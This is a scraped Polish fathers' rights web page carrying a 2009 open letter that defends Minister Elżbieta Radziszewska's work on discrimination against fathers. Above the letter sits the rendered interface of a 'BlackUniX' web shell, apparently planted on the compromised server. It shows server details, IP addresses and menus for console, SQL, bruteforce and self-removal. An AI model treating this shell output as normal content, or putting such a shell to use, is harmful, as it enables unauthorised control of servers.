W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-17 09:37:42
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.17.157
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Wystąpienie Forum w obronie Minister Radziszewskiej
27.02.2009.
W związku pojawiającymi się ostatnio negatywnymi ocenami działania Pani minister Elżbiety Radziszewskiej pragniemy poinformować, że w naszej ocenie należy uznać je za całkowicie niezasadne. Jako organizacje zrzeszone w Forum na Rzecz Odpowiedzialnego Ojcostwa stwierdzamy, że Pani minister Radziszewska jest pierwszym reprezentantem rządu który podjął systematyczny i rzeczowy dialog z organizacjami reprezentującymi dyskryminowanych mężczyzn. Od czasu objęcia stanowiska prze Panią Elżbietę Radziszewską uczestniczymy regularnie w spotkaniach przez nią organizowanych, dotyczących problemu dyskryminacji ojców i niewłaściwego postrzegania roli mężczyzny w rodzinie i społeczeństwie.

Szanowny Panie Premierze,


W związku pojawiającymi się ostatnio negatywnymi ocenami działania Pani minister Elżbiety
Radziszewskiej pragniemy poinformować, że w naszej ocenie należy uznać je za całkowicie
niezasadne.
Jako organizacje zrzeszone w Forum na Rzecz Odpowiedzialnego Ojcostwa stwierdzamy, że Pani
minister Radziszewska jest pierwszym reprezentantem rządu który podjął systematyczny i
rzeczowy dialog z organizacjami reprezentującymi dyskryminowanych mężczyzn. Od czasu objęcia
stanowiska prze Panią Elżbietę Radziszewską uczestniczymy regularnie w spotkaniach przez nią
organizowanych, dotyczących problemu dyskryminacji ojców i niewłaściwego postrzegania roli
mężczyzny w rodzinie i społeczeństwie.
Historia ruchu mającego na celu przeciwdziałanie nierównemu traktowaniu mężczyzn znajdujących
się w trudnej sytuacji około rozwodowej ma w Polsce 20 lat. Przez ten czas jedynie Pani minister
Radziszewska jako pierwszy i jak do tej pory jedyny przedstawiciel władz, zauważył, że zjawisko
dyskryminacji mężczyzn w naszym kraju ma miejsce i dotyczy coraz większej liczby osób.
Nie rozumiemy oburzenia środowisk feministycznych, które zarzucają Pani minister zbyt duże
zaangażowanie w sprawy dotyczące naszych problemów, narzucając nam pogląd, że dyskryminacja
ze względu na płeć dotyczy wyłącznie kobiet. Słusznie bowiem rozumie Pani minister swoją rolę:
jako pełnomocnika od dyskryminacji wszystkich, którzy czują się dyskryminowani. Skupianie się
wyłącznie na przejawach dyskryminacji kobiet, jest szkodliwe społecznie i krzywdzące dla takich
grup jakie reprezentują nasze organizacje. Nieprawdą jest również brak osiągnięć pracy Pani
minister, gdyż wymiernym efektem naszych spotkań z nią jest chociażby nowelizacja kodeksu
rodzinno-opiekuńczego. Podczas naszych spotkań u Pani minister, nie odczuliśmy by Pani Radziszewska w jakikolwiek
sposób bagatelizowała problemy grup, które czują się dyskryminowane. Uważamy, że jest osobą,
która z uwagą i ze zrozumieniem wysłuchuje racji stron. Zdarzało się, że podczas gdy
prezentowaliśmy jej nasze argumenty, Pani minister zwracała nam uwagę, że nasze żądania mogą
naruszać dobra innych. Obecna krytyka urzędu pełnomocnika ds. równego traktowania wynika
zapewne stąd, iż dotychczas problem dyskryminacji ze względu na płeć postrzegano bardzo
jednostronnie. Na dyskusję o tym problemie monopol miały jedynie środowiska feministyczne i
mniejszości seksualne. Z całą stanowczością stwierdzamy, że Pani minister Radziszewska
uwzględnia również racje tych grup.
Jesteśmy ogromnie wdzięczni, że jako przedstawiciel obecnego rządu w realny, wymierny i
obiektywny sposób przeciwdziała dyskryminacji ze względu na płeć.
Nie stwierdzamy żeby podczas spotkań u Pani minister antagonizowała ona pewne grupy ludzi, co
niesłusznie jej się zarzuca. Naszą współpracę uważamy za niezwykle korzystną i pożyteczną
społecznie, co w dużej mierze jest zasługą właśnie Pani minister Radziszewskiej.
Liczymy, że dialog z organizacjami reprezentującymi dyskryminowanych mężczyzn będzie
kontynuowany, oraz, że uda się nam we współpracy z Panią Minister nawiązać współpracę z
organizacjami kobiecymi tworząc szerokie Forum na Rzecz Odpowiedzialnego Rodzicielstwa.
W imieniu organizacji zrzeszonych w Forum:
Z poważaniem, 
Sławomir Mielnik
Marek Borkowski
Robert Kucharski
Ireneusz Dzierżęga
Mirosław Rygielski
Jarosław Maciaszek

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


17.07.2018.